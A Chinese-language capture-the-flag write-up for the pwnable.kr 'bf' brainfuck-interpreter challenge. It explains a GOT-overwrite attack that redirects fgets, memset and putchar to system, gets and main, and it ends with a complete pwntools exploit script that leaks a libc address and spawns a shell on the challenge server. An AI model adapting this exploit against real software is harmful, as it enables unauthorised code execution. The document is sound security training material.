这道题真tm迷
我们首先分析一下elf文件

这里是获取我们输入的字符串进行分析，如果是'<‘指针就减少1，是’>’指针就增加1，’.’ 输出指针指向的内容，’,’ 向指针写入

之后在main中发现这里对指针赋值为tape的地址
拿到shell的思路为改写got表中函数的地址

分为以下三步
1. 修改fgets的got内容为system地址
2. 修改memset的got表内容为gets地址
3. 修改puchar的got表内容为main程序地址

按照思路来说，应该是让程序在调用putchar的时跳到main的地址，之后程序执行到这里时

让执行memset时执行gets，之后在fgets处再执行system，就可以实现将输入字符串作为system的参数，就可以拿到shell了

至于如何获取system函数的地址，我上一篇文章也写了的，这里就不再赘述。

其实这个题最坑的地方是有延时，所以代码中有个sleep(1)
我在这个地方卡了很久，每次收到的字符数量都不够，然后直接报错。
最后我实在受不了了，参考了别人的wp才发现这个点。。。。。。

from pwn import *
import time


libc = ELF('bf_libc.so')
elf = ELF('bf')

p = remote('pwnable.kr',9001)

main_addr =  elf.symbols['main']
tape_addr = 0x0804a0a0
putchar_got_addr = 0x804a030
puts_got_addr = 0x804a018
memset_get_addr = 0x804a02c
fgets_got_addr = 0x804a010

print p.recvline()
print p.recvline()

payload = '<'*(tape_addr - fgets_got_addr)
payload += '.>'*4 + '<'*4
payload += ',>'*4 + '<'*4
payload += '>'*(memset_get_addr - fgets_got_addr)
payload += ',>'*4 + '<'*4
payload += '>'*(putchar_got_addr - memset_get_addr)
payload += ',>'*4
payload += '.'
p.sendline(payload)

time.sleep(1)
s = p.recv(4)
print hex(u32(s))
addr_fgets = u32(s)

sys_addr = addr_fgets - libc.symbols['fgets'] + libc.symbols['system']
gets_addr = addr_fgets - libc.symbols['fgets'] + libc.symbols['gets']

payload2 = p32(sys_addr) + p32(gets_addr) + p32(main_addr) + '/bin/sh' + '\n'

p.send(payload2)
p.interactive()